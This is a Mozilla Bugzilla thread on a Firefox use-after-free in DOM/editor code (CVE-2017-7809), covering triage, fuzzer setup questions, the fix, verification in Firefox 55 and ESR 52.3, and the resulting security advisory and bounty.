Comment 1

2 years ago
Posted file ASAN output
alexander: looks like this is reading a freed boolean. What happens after that? Would the use be benign, or would there be a following UAF on the same object with more import?
Flags: needinfo?(surkov.alexander)
Group: core-security → dom-core-security
Again, I got stuck with DOMFuzzer. I'm following these steps:
1) allow unsigned add-ons, i.e., set xpinstall.signatures.required to false
2) install https://www.squarefree.com/extensions/domFuzzLite3.xpi 

It says "DOM Fuzz Helper could not be installed because it is incompatible with Nightly 56.0a1"

Any hints?
Flags: needinfo?(surkov.alexander)
(Reporter)

Comment 4

2 years ago
Try setting extensions.allow-non-mpc-extensions to true
Keywords: csectype-uaf, sec-high, testcase
(In reply to Nils from comment #4)
> Try setting extensions.allow-non-mpc-extensions to true

Yep, that did the trick, thanks!
Assignee: nobody → eitan
It looks like the DOM node is being deleted prematurely during tree traversal while still bound to the document. Is this a cycle collection bug?

I'm getting this assertion:
Assertion failure: mSubtreeRoot == this (Didn't restore state properly?), at /home/eitan/Mozilla/gecko/dom/base/nsINode.cpp:157

I get this also when I comment out enableAccessibility from the test case, so I am assuming this is not an accessibility API issue.

Olli added that assertion, so he may have a better idea of how we got to that state.
Flags: needinfo?(bugs)
(Assignee)

Comment 7

2 years ago
Hmm, some native anonymous span element. Sounds like editor.
Assignee: eitan → nobody
Component: Disability Access APIs → Editor
(Assignee)

Updated

2 years ago
Assignee: nobody → bugs
Flags: needinfo?(bugs)
(Assignee)

Comment 8

2 years ago
Sorry, I messed with bugs now. I managed to upload the patch for this to bug 1371657.
(Assignee)

Comment 9

2 years ago
This patch landed to m-i and beta in bug 1371657
I assume Al's going to need to do some security flag switcharoos here too.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: --- → fixed
status-firefox56: --- → fixed
status-firefox57: --- → fixed
status-firefox-esr52: --- → fixed
tracking-firefox55: --- → ?
tracking-firefox56: --- → ?
tracking-firefox57: --- → ?
tracking-firefox-esr52: --- → ?
Flags: needinfo?(abillings)
Resolution: --- → FIXED
Target Milestone: --- → mozilla57
Version: 56 Branch → unspecified
Nils, looks like we, uh, *cough*, accidentally fixed this bug in Firefox 55 and ESR52.3.

Can you validate it is fixed in 55? Builds go live in the morning, so the advisory will probably be slightly delayed while we wait for confirmation.
Flags: needinfo?(abillings) → needinfo?(nils)
Alias: CVE-2017-7809
Group: dom-core-security → core-security-release
tracking-firefox55: ? → +
tracking-firefox56: ? → +
tracking-firefox57: ? → +
tracking-firefox-esr52: ? → 55+
(Reporter)

Comment 12

2 years ago
Al, I can confirm that the testcase doesn't reproduce in the latest ASAN build of Firefox 55 :)
Flags: needinfo?(nils)
Whiteboard: [adv-main55+][adv-esr52.3+]
Added to the 55 and ESR 52.3 advisory.
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release